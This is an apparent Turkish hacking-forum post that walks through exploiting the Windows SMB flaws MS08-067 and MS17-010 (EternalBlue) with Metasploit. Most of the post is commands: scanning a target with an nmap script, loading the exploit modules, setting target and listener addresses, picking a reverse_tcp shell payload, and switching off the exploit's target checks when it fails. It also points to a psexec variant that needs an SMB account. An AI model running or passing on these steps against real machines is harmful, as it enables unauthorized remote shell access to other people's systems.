• Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

MS08-067 And MS17_010 Microsoft Exploitation

KARA

Unutamadıklarımıza..
MS08-067:
-
Genelde XP makinelerde bulunur. SMB servisi üzerine yazılmış bir exploittir.

-Zafiyetin tespiti için nmap'ın bir scriptini kullanacağız.İlk önce scripti bulmak için
usr/share/nmap/scripts/

yazarak scriptlerin bulunduğu dosyaya geliyoruz.Daha sonra scripti aramak için
ls | grep "ms08"

yazıyoruz.Karşımıza çıkan script ile
nmap --scripts scriptadı ipadresi -p445

yazıyoruz ce sistemin bu zafiyete karşı savunmasız olduğunu gördükten sonra msfconsole'a giriyoruz.

use exploit/windows/smb/ms08_067_netapi

yazdıktan sonra show options diyoruz ve bizden istenilenleri set ediyoruz(rhost)
daha sonra bir payloads seçiyoruz.Benim önerim reverse_tcp payloadı
set payload windows/shell/reverse_tcp

yazdıktan sonra options diyerek payloadın bizden istediği bilgilere bakıyoruz ve onları set ediyoruz.(lhost)
daha sonra exploit/run diyerek exploiti başlatıyoruz.Artık shelldeyiz :)
ms08-067.png
Veyahut görseldeki gibi sadece exploit ile devam edebiliriz.Meterpreter'e düştükten sonra shell komutu ile komut satırına inebiliriz.


MS17_010:
WİN7-10 Ve 2008 Microsoft Serverlarda bulunan bir exploittir.MS08'e göre daha büyük bir etki alanına sahiptir.Kısacası MS08'in geliştirilmiş versiyonudur.

MS08'de zafiyetin tespitini göstermiştim.Aynı şekilde MS10'a uyarlayarak yapacaksınız.Direkt exploitleme işlemine geçiyorum.İlk olarak msfconsole'i açıyoruz.
use exploit/windows/smb/ms17_010_eternalblue
show options
dedikten sonra bizden istenilen yerleri set ediyoruz.ve exploiti başlatıyoruz.

Eğer exploit çalışmazsa Verify değerlerini False yapıyoruz.Yani şöyle
set VerifyArch false

set VerifyTarget false

Daha sonra payloadımızı set edelim.
set payload/windows/shell/reverse_tcp
dedikten sonra payloadın bizden istediklerini set ediyoruz(lhost) ve run diyerek çalıştırıyoruz.

Sistem 1-2 defa yeniden başlayabilir tekrar deneyin .Eğer resmi bir pentest işlemi gerçekleştiriyorsanız bunu yetkililere bildirmelisiniz.

Eğer exploit yine çalışmazsa payloadın mimarisinden kaynaklı bir hatadır.Payloadı değiştirin.
MS17.png

Birde söylemeden geçmek istemiyorum.Bu MS17_010 exploitinin geliştirilmiş versiyonu olan MS17_010_PSEXEC exploiti var.
Bu exploit bütün windows işletim sistemlerinde sorunsuz çalışabiliyor.Fakat kullanmamız için bizden herhangi bir smb user'i istiyor.
Ve daha önce bahsettiğim sistemin baştan başlama sorunu ortadan kalkıyor bu exploit ile.Kullanımı aynı sadece smb user i set etmemiz gerekiyor.

Başka Bir Konuda Görüşmek Üzere..
 
Üst